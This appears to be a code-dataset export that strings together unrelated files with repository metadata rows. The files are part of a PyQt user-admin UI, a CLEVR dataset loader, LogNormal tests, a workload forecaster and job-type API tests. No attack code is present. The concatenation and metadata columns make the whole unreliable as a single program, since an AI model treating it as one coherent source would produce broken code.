self.toolButton.setText("")
self.toolButton.setIcon(icon1)
self.toolButton.setIconSize(QtCore.QSize(15, 15))
self.toolButton.setObjectName("toolButton")
self.role = QtWidgets.QLabel(self.frame)
self.role.setGeometry(QtCore.QRect(30, 120, 110, 15))
font = QtGui.QFont()
font.setPointSize(7)
self.role.setFont(font)
self.role.setText("")
self.role.setAlignment(QtCore.Qt.AlignCenter)
self.role.setObjectName("role")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
self.stackedWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.name.setText(_translate("MainWindow", "csa "))
self.label.setText(_translate("MainWindow", "姓名:"))
self.label_3.setText(_translate("MainWindow", "性别:"))
self.label_4.setText(_translate("MainWindow", "申请时间:"))
self.label_5.setText(_translate("MainWindow", "权限:"))
self.label_6.setText(_translate("MainWindow", "手机号:"))
self.label_7.setText(_translate("MainWindow", "身份证号:"))
self.sname.setText(_translate("MainWindow", "邵嘉毅"))
self.ssex.setText(_translate("MainWindow", "男"))
self.stime.setText(_translate("MainWindow", "2019-12-12"))
self.srole.setText(_translate("MainWindow", "1"))
self.sphone.setText(_translate("MainWindow", "2332121323"))
self.sidcard.setText(_translate("MainWindow", "1111111111111111111"))
self.label_8.setText(_translate("MainWindow", "用户号:"))
self.sidcard_2.setText(_translate("MainWindow", "1"))
item = self.searchTable.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "用户编号"))
item = self.searchTable.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "姓名"))
item = self.searchTable.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "性别"))
item = self.searchTable.horizontalHeaderItem(3)
item.setText(_translate("MainWindow", "登记申请时间"))
item = self.searchTable.horizontalHeaderItem(4)
item.setText(_translate("MainWindow", "账户名"))
item = self.searchTable.horizontalHeaderItem(5)
item.setText(_translate("MainWindow", "密码"))
item = self.searchTable.horizontalHeaderItem(6)
item.setText(_translate("MainWindow", "权限"))
item = self.searchTable.horizontalHeaderItem(7)
item.setText(_translate("MainWindow", "身份证号"))
item = self.searchTable.horizontalHeaderItem(8)
item.setText(_translate("MainWindow", "手机号"))
self.searchName.setPlaceholderText(_translate("MainWindow", "搜索用户姓名"))
self.label_74.setText(_translate("MainWindow", "选中部分修改为:"))
self.modifyvalue.setPlaceholderText(_translate("MainWindow", "修改值"))
self.commitTableModify.setText(_translate("MainWindow", "确认修改"))
self.label_78.setText(_translate("MainWindow", "*选中表格内可以进行修改和删除操作"))
self.commitTableDel.setText(_translate("MainWindow", "确认删除"))
self.toolButton_2.setText(_translate("MainWindow", "查询用户"))
self.label_9.setText(_translate("MainWindow", "用户编号:"))
self.label_10.setText(_translate("MainWindow", "账户名:"))
self.label_11.setText(_translate("MainWindow", "用户姓名:"))
self.label_12.setText(_translate("MainWindow", "密码:"))
self.label_13.setText(_translate("MainWindow", "用户性别:"))
self.label_14.setText(_translate("MainWindow", "权限:"))
self.label_15.setText(_translate("MainWindow", "登记入职时间:"))
self.label_16.setText(_translate("MainWindow", "身份证:"))
self.label_17.setText(_translate("MainWindow", "手机号:"))
self.inputsid.setPlaceholderText(_translate("MainWindow", "编号"))
self.inputname.setPlaceholderText(_translate("MainWindow", "姓名"))
self.inputuser.setPlaceholderText(_translate("MainWindow", "账号名"))
self.inputpwd.setPlaceholderText(_translate("MainWindow", "密码"))
self.inputrole.setPlaceholderText(_translate("MainWindow", "权限"))
self.inputidcard.setPlaceholderText(_translate("MainWindow", "身份证"))
self.inputphone.setPlaceholderText(_translate("MainWindow", "手机号"))
self.toolButton_3.setText(_translate("MainWindow", "增添用户"))
self.commitAdd.setText(_translate("MainWindow", "确认录入"))
self.inputfemale.setText(_translate("MainWindow", "女"))
self.inputmale.setText(_translate("MainWindow", "男"))
self.toolButton_4.setText(_translate("MainWindow", "删除用户"))
item = self.deleteTable.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "用户编号"))
item = self.deleteTable.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "姓名"))
item = self.deleteTable.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "性别"))
item = self.deleteTable.horizontalHeaderItem(3)
item.setText(_translate("MainWindow", "登记入职时间"))
item = self.deleteTable.horizontalHeaderItem(4)
item.setText(_translate("MainWindow", "账户名"))
item = self.deleteTable.horizontalHeaderItem(5)
item.setText(_translate("MainWindow", "密码"))
item = self.deleteTable.horizontalHeaderItem(6)
item.setText(_translate("MainWindow", "权限"))
item = self.deleteTable.horizontalHeaderItem(7)
item.setText(_translate("MainWindow", "身份证号"))
item = self.deleteTable.horizontalHeaderItem(8)
item.setText(_translate("MainWindow", "手机号"))
self.desid.setPlaceholderText(_translate("MainWindow", "编号"))
self.label_18.setText(_translate("MainWindow", "用户编号:"))
self.dename.setPlaceholderText(_translate("MainWindow", "姓名"))
self.label_19.setText(_translate("MainWindow", "用户姓名:"))
self.deidcard.setPlaceholderText(_translate("MainWindow", "身份证"))
self.label_20.setText(_translate("MainWindow", "身份证:"))
self.commitDe.setText(_translate("MainWindow", "确认删除"))
self.label_21.setText(_translate("MainWindow", "选择要删除的用户:"))
__sortingEnabled = self.listWidget.isSortingEnabled()
self.listWidget.setSortingEnabled(False)
item = self.listWidget.item(0)
item.setText(_translate("MainWindow", " 个人信息"))
item = self.listWidget.item(1)
item.setText(_translate("MainWindow", " 查询用户*"))
item = self.listWidget.item(2)
item.setText(_translate("MainWindow", " 增添用户*"))
item = self.listWidget.item(3)
item.setText(_translate("MainWindow", " 删除用户*"))
self.listWidget.setSortingEnabled(__sortingEnabled)
self.label_2.setText(_translate("MainWindow", "*表示需要最高权限"))
self.Search.setPlaceholderText(_translate("MainWindow", "搜索"))
| 46.750939
| 101
| 0.591235
| 37,819
| 0.993668
| 0
| 0
| 0
| 0
| 0
| 0
| 6,332
| 0.166369
|
42308174a4346509fdf47445522e3c2f26a6c431
| 2,171
|
py
|
Python
|
dataset.py
|
ceyzaguirre4/mac-network-pytorch
|
ad2deefc8a987ab92f4911d3d98631f22d0ae44a
|
[
"MIT"
] | 4
|
2020-04-08T22:19:19.000Z
|
2020-10-28T23:22:12.000Z
|
dataset.py
|
ceyzaguirre4/mac-network-pytorch
|
ad2deefc8a987ab92f4911d3d98631f22d0ae44a
|
[
"MIT"
] | null | null | null |
dataset.py
|
ceyzaguirre4/mac-network-pytorch
|
ad2deefc8a987ab92f4911d3d98631f22d0ae44a
|
[
"MIT"
] | 3
|
2020-06-27T02:47:02.000Z
|
2021-10-08T13:19:05.000Z
|
import os
import pickle
import numpy as np
from PIL import Image
import torch
from torch.utils.data import Dataset
from torchvision import transforms
import h5py
from transforms import Scale
class CLEVR(Dataset):
def __init__(self, root, split='train', transform=None):
features_path = os.path.join(root, 'features')
with open('{}/{}.pkl'.format(features_path, split), 'rb') as f:
self.data = pickle.load(f)
# self.transform = transform
self.root = root
self.split = split
self.h = h5py.File('{}/{}_features.hdf5'.format(features_path, split), 'r')
self.img = self.h['data']
def close(self):
self.h.close()
def __getitem__(self, index):
imgfile, question, answer, family = self.data[index]
# img = Image.open(os.path.join(self.root, 'images',
# self.split, imgfile)).convert('RGB')
# img = self.transform(img)
id = int(imgfile.rsplit('_', 1)[1][:-4])
img = torch.from_numpy(self.img[id])
return img, question, len(question), answer, family, index
def __len__(self):
return len(self.data)
transform = transforms.Compose([
Scale([224, 224]),
transforms.Pad(4),
transforms.RandomCrop([224, 224]),
transforms.ToTensor(),
transforms.Normalize(mean=[0.5, 0.5, 0.5],
std=[0.5, 0.5, 0.5])
])
def collate_data(batch):
images, lengths, answers, families, idxs = [], [], [], [], []
batch_size = len(batch)
max_len = max(map(lambda x: len(x[1]), batch))
questions = np.zeros((batch_size, max_len), dtype=np.int64)
sort_by_len = sorted(batch, key=lambda x: len(x[1]), reverse=True)
for i, b in enumerate(sort_by_len):
image, question, length, answer, family, idx = b
images.append(image)
length = len(question)
questions[i, :length] = question
lengths.append(length)
answers.append(answer)
families.append(family)
idxs.append(idx)
return torch.stack(images), torch.from_numpy(questions), \
lengths, torch.LongTensor(answers), families, idxs
| 29.739726
| 83
| 0.609857
| 986
| 0.454169
| 0
| 0
| 0
| 0
| 0
| 0
| 237
| 0.109166
|
4230af0cdb6333a2256b37fbde92023b5213c5d6
| 1,445
|
py
|
Python
|
tests/distributions/test_log_normal.py
|
thomasaarholt/xgboost-distribution
|
8ee00f7f0dcaadcb345ebcb15534287081aa987b
|
[
"MIT"
] | 17
|
2021-08-14T10:23:54.000Z
|
2022-01-08T11:54:48.000Z
|
tests/distributions/test_log_normal.py
|
thomasaarholt/xgboost-distribution
|
8ee00f7f0dcaadcb345ebcb15534287081aa987b
|
[
"MIT"
] | 17
|
2021-06-22T02:23:53.000Z
|
2022-03-02T16:03:21.000Z
|
tests/distributions/test_log_normal.py
|
thomasaarholt/xgboost-distribution
|
8ee00f7f0dcaadcb345ebcb15534287081aa987b
|
[
"MIT"
] | 6
|
2021-08-18T18:52:13.000Z
|
2021-11-19T08:36:50.000Z
|
import pytest
import numpy as np
import pandas as pd
from xgboost_distribution.distributions import LogNormal
@pytest.fixture
def lognormal():
return LogNormal()
def test_target_validation(lognormal):
valid_target = np.array([0.5, 1, 4, 5, 10])
lognormal.check_target(valid_target)
@pytest.mark.parametrize(
"invalid_target",
[np.array([0, 1.2]), pd.Series([-1.1, 0.4, 2.3])],
)
def test_target_validation_raises(lognormal, invalid_target):
with pytest.raises(ValueError):
lognormal.check_target(invalid_target)
@pytest.mark.parametrize(
"y, params, natural_gradient, expected_grad",
[
(
np.array([1, 1]),
np.array([[np.log(1), 2], [1, 0]]),
True,
np.array([[0, 0.5], [1, 0]]),
),
(
np.array([1, 1]),
np.array([[np.log(1), 2], [1, 0]]),
False,
np.array([[0, 1], [1, 0]]),
),
],
)
def test_gradient_calculation(lognormal, y, params, natural_gradient, expected_grad):
grad, hess = lognormal.gradient_and_hessian(
y, params, natural_gradient=natural_gradient
)
np.testing.assert_array_equal(grad, expected_grad)
def test_loss(lognormal):
loss_name, loss_value = lognormal.loss(
# fmt: off
y=np.array([0, ]),
params=np.array([[1, 0], ]),
)
assert loss_name == "LogNormalError"
assert loss_value == np.inf
| 24.083333
| 85
| 0.600692
| 0
| 0
| 0
| 0
| 960
| 0.66436
| 0
| 0
| 86
| 0.059516
|
4230f1879c1a68f9bf6052b16b5fb1dd036ba09b
| 14,169
|
py
|
Python
|
script/forecasting/forecaster.py
|
bialesdaniel/noisepage
|
44ca689bd818b1bd39b84a7fe5148ddaa65a61eb
|
[
"MIT"
] | null | null | null |
script/forecasting/forecaster.py
|
bialesdaniel/noisepage
|
44ca689bd818b1bd39b84a7fe5148ddaa65a61eb
|
[
"MIT"
] | null | null | null |
script/forecasting/forecaster.py
|
bialesdaniel/noisepage
|
44ca689bd818b1bd39b84a7fe5148ddaa65a61eb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
Main script for workload forecasting.
Example usage:
- Generate data (runs OLTP benchmark on the built database) and perform training, and save the trained model
./forecaster --gen_data --models=LSTM --model_save_path=model.pickle
- Use the trained models (LSTM) to generate predictions.
./forecaster --model_load_path=model.pickle --test_file=test_query.csv --test_model=LSTM
TODO:
- Better metrics for training and prediction (currently not focusing on models' accuracy yet)
- Multiple models (currently only simple-one-layer-untuned LSTM used)
- API and interaction with Pilot
"""
import argparse
import json
import pickle
from functools import lru_cache
from typing import Dict, List, Optional, Tuple, Union
import numpy as np
from ..testing.self_driving.constants import (DEFAULT_ITER_NUM,
DEFAULT_QUERY_TRACE_FILE,
DEFAULT_TPCC_WEIGHTS,
DEFAULT_WORKLOAD_PATTERN)
from ..testing.self_driving.forecast import gen_oltp_trace
from ..testing.util.constants import LOG
from .cluster import QueryCluster
from .data_loader import DataLoader
from .models import ForecastModel, get_models
# Interval duration for aggregation in microseconds
INTERVAL_MICRO_SEC = 500000
# Number of Microseconds per second
MICRO_SEC_PER_SEC = 1000000
# Number of data points in a sequence
SEQ_LEN = 10 * MICRO_SEC_PER_SEC // INTERVAL_MICRO_SEC
# Number of data points for the horizon
HORIZON_LEN = 30 * MICRO_SEC_PER_SEC // INTERVAL_MICRO_SEC
# Number of data points for testing set
EVAL_DATA_SIZE = 2 * SEQ_LEN + HORIZON_LEN
argp = argparse.ArgumentParser(description="Query Load Forecaster")
# Generation stage related options
argp.add_argument(
"--gen_data",
default=False,
action="store_true",
help="If specified, OLTP benchmark would be downloaded and built to generate the query trace data")
argp.add_argument(
"--tpcc_weight",
type=str,
default=DEFAULT_TPCC_WEIGHTS,
help="Workload weights for the TPCC")
argp.add_argument(
"--tpcc_rates",
nargs="+",
default=DEFAULT_WORKLOAD_PATTERN,
help="Rate array for the TPCC workload")
argp.add_argument(
"--pattern_iter",
type=int,
default=DEFAULT_ITER_NUM,
help="Number of iterations the DEFAULT_WORKLOAD_PATTERN should be run")
argp.add_argument("--trace_file", default=DEFAULT_QUERY_TRACE_FILE,
help="Path to the query trace file", metavar="FILE")
# Model specific
argp.add_argument("--models", nargs='+', type=str, help="Models to use")
argp.add_argument("--models_config", type=str, metavar="FILE",
help="Models and init arguments JSON config file")
argp.add_argument("--seq_len", type=int, default=SEQ_LEN,
help="Length of one sequence in number of data points")
argp.add_argument(
"--horizon_len",
type=int,
default=HORIZON_LEN,
help="Length of the horizon in number of data points, "
"aka, how many further in the a sequence is used for prediction"
)
# Training stage related options
argp.add_argument("--model_save_path", metavar="FILE",
help="Where the model trained will be stored")
argp.add_argument(
"--eval_size",
type=int,
default=EVAL_DATA_SIZE,
help="Length of the evaluation data set length in number of data points")
argp.add_argument("--lr", type=float, default=0.001, help="Learning rate")
argp.add_argument("--epochs", type=int, default=10,
help="Number of epochs for training")
# Testing stage related options
argp.add_argument(
"--model_load_path",
default="model.pickle",
metavar="FILE",
help="Where the model should be loaded from")
argp.add_argument(
"--test_file",
help="Path to the test query trace file",
metavar="FILE")
argp.add_argument(
"--test_model",
type=str,
help="Model to be used for forecasting"
)
class Forecaster:
"""
A wrapper around various ForecastModels, that prepares training and evaluation data.
"""
TRAIN_DATA_IDX = 0
TEST_DATA_IDX = 1
def __init__(
self,
trace_file: str,
interval_us: int = INTERVAL_MICRO_SEC,
test_mode: bool = False,
eval_size: int = EVAL_DATA_SIZE,
seq_len: int = SEQ_LEN,
horizon_len: int = HORIZON_LEN) -> None:
"""
Initializer
:param trace_file: trace file for the forecaster
:param interval_us: number of microseconds for the time-series interval
:param test_mode: True If the Loader is for testing
:param eval_size: Number of data points used for evaluation(testing)
:param seq_len: Length of a sequence
:param horizon_len: Horizon length
"""
self._seq_len = seq_len
self._horizon_len = horizon_len
self._test_mode = test_mode
self._eval_data_size = eval_size
self._data_loader = DataLoader(
query_trace_file=trace_file,
interval_us=interval_us)
self._make_clusters()
def _make_clusters(self) -> None:
"""
Extract data from the DataLoader and put them into different clusters.
:return: None
"""
# FIXME:
# Assuming all the queries in the current trace file are from
# the same cluster for now. A future TODO would have a clustering
# process that separates traces into multiple clusters
self._clusters = [QueryCluster(self._data_loader.get_ts_data())]
self._cluster_data = []
for cluster in self._clusters:
# Aggregated time-series from the cluster
data = cluster.get_timeseries()
train_raw_data, test_raw_data = self._split_data(data)
self._cluster_data.append((train_raw_data, test_raw_data))
def _split_data(self, data: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
"""
Split the raw data into a training set, and a testing(evaluation) set.
:param data: All the raw data
:return: traing, test raw data set
"""
if self._test_mode:
self._test_set_size = len(data)
else:
self._test_set_size = self._eval_data_size
if self._test_set_size > len(data):
raise ValueError(
"Eval data size is too small. Not enough data points.")
split_idx = len(data) - self._test_set_size
# First part as the training set
train_raw_data = data[:split_idx]
# Last part as the testing set
test_raw_data = data[split_idx:]
return train_raw_data, test_raw_data
def _make_seqs(self,
input_data: np.ndarray,
start: int,
end: int,
with_label: bool = False) -> List[Union[Tuple[np.ndarray,
np.ndarray],
np.ndarray]]:
"""
Create time-series sequences of fixed sequence length from a continuous range of time-series.
:param input_data: Input time-series
:param start: Start index (inclusive) of the first sequence to be made
:param end: End index (exclusive) of the last sequence to be made
:param with_label: True if label in a certain horizon is added
:return: Sequences of fixed length if with_label is False,
or List of fixed length sequence and label if with_label is True
"""
seq_len = self._seq_len
horizon = self._horizon_len
seq_start = start
if with_label:
# Reserve space for horizon
seq_end = end - seq_len - horizon
else:
# Use all data for prediction
seq_end = end - seq_len
if seq_end <= seq_start:
raise IndexError(f"Not enough data points to make sequences")
seqs = []
for i in range(seq_start, seq_end):
seq = input_data[i:i + seq_len].reshape(-1, 1)
# Look beyond the horizon to get the label
if with_label:
label_i = i + seq_len + horizon
label = input_data[label_i: label_i + 1].reshape(1, -1)
seqs.append((seq, label))
else:
seqs.append(seq)
return seqs
@lru_cache(maxsize=32)
def _cluster_seqs(self,
cluster_id: int,
test_mode: bool = False,
with_label: bool = False) -> List[Union[Tuple[np.ndarray,
np.ndarray],
np.ndarray]]:
"""
Create time-series sequences of fixed sequence length from a continuous range of time-series. A cached wrapper
over _make_seqs with different options.
:param cluster_id: Cluster id
:param test_mode: True if using test dataset, otherwise use the training dataset
:param with_label: True if label (time-series data in a horizon from the sequence) is also added.
:return: Sequences of fixed length if with_label is False,
or List of fixed length sequence and label if with_label is True
"""
if test_mode:
input_data = self._cluster_data[cluster_id][self.TEST_DATA_IDX]
else:
input_data = self._cluster_data[cluster_id][self.TRAIN_DATA_IDX]
seqs = self._make_seqs(
input_data,
0,
len(input_data),
with_label=with_label)
return seqs
def train(self, models_kwargs: Dict) -> List[List[ForecastModel]]:
"""
:param models_kwargs: A dictionary of models' init arguments
:return: List of models(a list of models) for each cluster.
"""
models = []
for cid in range(len(self._cluster_data)):
cluster_models = get_models(models_kwargs)
train_seqs = self._cluster_seqs(
cid, test_mode=False, with_label=True)
for model_name, model in cluster_models.items():
# Fit the model
model.fit(train_seqs)
self.eval(cid, model)
models.append(cluster_models)
return models
def eval(self, cid: int, model: ForecastModel) -> None:
"""
Evaluate a fitted model on the test dataset.
:param cid: Cluster id
:param model: Model to use
"""
eval_seqs = self._cluster_seqs(cid, test_mode=True, with_label=True)
preds = []
gts = []
for seq, label in eval_seqs:
pred = model.predict(seq)
preds.append(pred)
gts.append(label.item())
# FIXME:
# simple L2 norm for comparing the prediction and results
l2norm = np.linalg.norm(np.array(preds) - np.array(gts))
LOG.info(
f"[{model.name}] has L2 norm(prediction, ground truth) = {l2norm}")
def predict(self, cid: int, model: ForecastModel) -> Dict:
"""
Output prediction on the test dataset, and segregate the predicted cluster time-series into individual queries
:param cid: Cluser id
:param model: Model to use
:return: Dict of {query_id -> time-series}
"""
test_seqs = self._cluster_seqs(cid, test_mode=True, with_label=False)
preds = list([model.predict(seq) for seq in test_seqs])
query_preds = self._clusters[cid].segregate(preds)
return query_preds
def parse_model_config(model_names: Optional[List[str]],
models_config: Optional[str]) -> Dict:
"""
Load models from
:param model_names: List of model names
:param models_config: JSON model config file
:return: Merged model config Dict
"""
model_kwargs = dict([(model_name, {}) for model_name in model_names])
if models_config is not None:
with open(models_config, 'r') as f:
custom_config = json.load(f)
# Simple and non-recursive merging of options
model_kwargs.update(custom_config)
if len(model_kwargs) < 1:
raise ValueError("At least 1 model needs to be used.")
return model_kwargs
if __name__ == "__main__":
args = argp.parse_args()
if args.test_file is None:
# Parse models arguments
models_kwargs = parse_model_config(args.models, args.models_config)
# Generate OLTP trace file
if args.gen_data:
gen_oltp_trace(
tpcc_weight=args.tpcc_weight,
tpcc_rates=args.tpcc_rates,
pattern_iter=args.pattern_iter)
trace_file = DEFAULT_QUERY_TRACE_FILE
else:
trace_file = args.trace_file
forecaster = Forecaster(
trace_file=trace_file,
interval_us=INTERVAL_MICRO_SEC,
seq_len=args.seq_len,
eval_size=args.eval_size,
horizon_len=args.horizon_len)
models = forecaster.train(models_kwargs)
# Save the model
if args.model_save_path:
with open(args.model_save_path, "wb") as f:
pickle.dump(models, f)
else:
# Do inference on a trained model
with open(args.model_load_path, "rb") as f:
models = pickle.load(f)
forecaster = Forecaster(
trace_file=args.test_file,
test_mode=True,
interval_us=INTERVAL_MICRO_SEC,
seq_len=args.seq_len,
eval_size=args.eval_size,
horizon_len=args.horizon_len)
# FIXME:
# Assuming all the queries in the current trace file are from
# the same cluster for now
query_pred = forecaster.predict(0, models[0][args.test_model])
# TODO:
# How are we consuming predictions?
for qid, ts in query_pred.items():
LOG.info(f"[Query: {qid}] pred={ts[:10]}")
| 36.145408
| 118
| 0.619239
| 7,744
| 0.546545
| 0
| 0
| 1,290
| 0.091044
| 0
| 0
| 5,572
| 0.393253
|
4231a5537ad061f7ccafef21420ba06d2605d9cf
| 66,059
|
py
|
Python
|
tests/test_master/test_jobtypes_api.py
|
guidow/pyfarm-master
|
d41c8f1eb5bfefb8400d400bcecadf197bcfb80a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_master/test_jobtypes_api.py
|
guidow/pyfarm-master
|
d41c8f1eb5bfefb8400d400bcecadf197bcfb80a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_master/test_jobtypes_api.py
|
guidow/pyfarm-master
|
d41c8f1eb5bfefb8400d400bcecadf197bcfb80a
|
[
"Apache-2.0"
] | null | null | null |
# No shebang line, this module is meant to be imported
#
# Copyright 2013 Oliver Palmer
# Copyright 2014 Ambient Entertainment GmbH & Co. KG
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from json import dumps
# test class must be loaded first
from pyfarm.master.testutil import BaseTestCase
BaseTestCase.build_environment()
from pyfarm.master.application import get_api_blueprint
from pyfarm.master.entrypoints import load_api
from pyfarm.models.jobtype import JobType, JobTypeVersion
code = """from pyfarm.jobtypes.core.jobtype import JobType
class TestJobType(JobType):
def get_command(self):
return "/usr/bin/touch"
def get_arguments(self):
return [os.path.join(
self.assignment_data["job"]["data"]["path"],
"%04d" % self.assignment_data[\"tasks\"][0][\"frame\"])]
"""
class TestJobTypeAPI(BaseTestCase):
def setup_app(self):
super(TestJobTypeAPI, self).setup_app()
self.api = get_api_blueprint()
self.app.register_blueprint(self.api)
load_api(self.app, self.api)
def test_jobtype_schema(self):
response = self.client.get("/api/v1/jobtypes/schema")
self.assert_ok(response)
schema = JobType.to_schema()
schema.update(JobTypeVersion.to_schema())
self.assertEqual(response.json, schema)
def test_jobtype_post(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response2)
self.assertEqual(
response2.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
response3 = self.client.get("/api/v1/jobtypes/%s" % id)
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_post_empty_max_batch(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": None,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response2)
self.assertEqual(
response2.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": None,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_post_with_requirements(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
software_id = response1.json['id']
software_min_version_id = response1.json["versions"][0]["id"]
software_max_version_id = response1.json["versions"][1]["id"]
response2 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"batch_contiguous": True,
"classname": None,
"no_automatic_start_time": False,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [{
'max_version': '1.1',
'max_version_id': software_max_version_id,
'min_version': '1.0',
'min_version_id': software_min_version_id,
'software': 'foo',
'software_id': software_id
}],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_post_with_bad_requirements(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [{
"hardware": "bar"
}]
}))
self.assert_bad_request(response1)
response2 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [{
"software": "unknown_software"
}]
}))
self.assert_not_found(response2)
def test_jobtype_post_conflict(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_conflict(response2)
def test_jobtypes_list(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get("/api/v1/jobtypes/")
self.assert_ok(response2)
self.assertEqual(
response2.json, [
{
"id": id,
"name": "TestJobType"
}
])
def test_jobtype_post_with_no_name(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"description": "Jobtype for testing inserts and queries",
"code": code
}))
self.assert_bad_request(response1)
def test_jobtype_post_with_no_code(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries"
}))
self.assert_bad_request(response1)
def test_jobtype_post_with_additional_keys(self):
response1 = self.client.post(
"/api/v1/jobtypes/",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"code": code,
"unknown_key": 42
}))
self.assert_bad_request(response1)
def test_jobtype_get_unknown(self):
response1 = self.client.get("/api/v1/jobtypes/unknown_jobtype")
self.assert_not_found(response1)
def test_jobtype_put(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response2)
self.assertEqual(
response2.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_put_overwrite(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.put(
"/api/v1/jobtypes/%s" % id,
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing (updated)",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.get("/api/v1/jobtypes/%s" % id)
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing (updated)",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 2,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_put_unknown_keys(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"unknown_key": 42
}))
self.assert_bad_request(response1)
